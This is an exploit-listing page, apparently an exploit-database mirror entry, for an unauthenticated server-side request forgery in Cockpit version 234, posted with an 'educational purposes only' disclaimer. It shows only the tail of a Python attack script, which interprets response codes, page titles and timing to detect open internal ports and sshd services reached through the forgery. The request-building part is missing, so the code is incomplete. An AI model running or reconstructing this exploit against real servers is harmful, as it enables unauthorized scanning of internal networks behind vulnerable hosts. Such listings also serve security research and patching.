Cockpit version 234 serverside request forgery (unauthenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-01-08 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Cockpit version 234 serverside request forgery (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
if responseCode == 404:
print("Cockpit server was not found!")
elif responseCode == 401:
if soup.title.string == "Authentication failed":
print(Fore.GREEN + Style.BRIGHT + "[+] Port: "+ unsafe + " sshd service is detected!")
elif soup.title.string == "Authentication failed: no-host":
if responseTime > "0:00:10.000000":
print(Fore.GREEN + Style.BRIGHT +"[-] Port: "+ unsafe + " is open, sshd service is not detected!")
else:
print(Fore.RED + Style.BRIGHT +"[-] Port: "+ unsafe + " sshd service is not detected!")
else:
print(Fore.RED + Style.BRIGHT +"[-] Error is occured!")
print("[-] One bad day!")
sys.exit(1)
else:
print("Something went wrong!")
main()
Cockpit version 234 serverside request forgery (unauthenticated)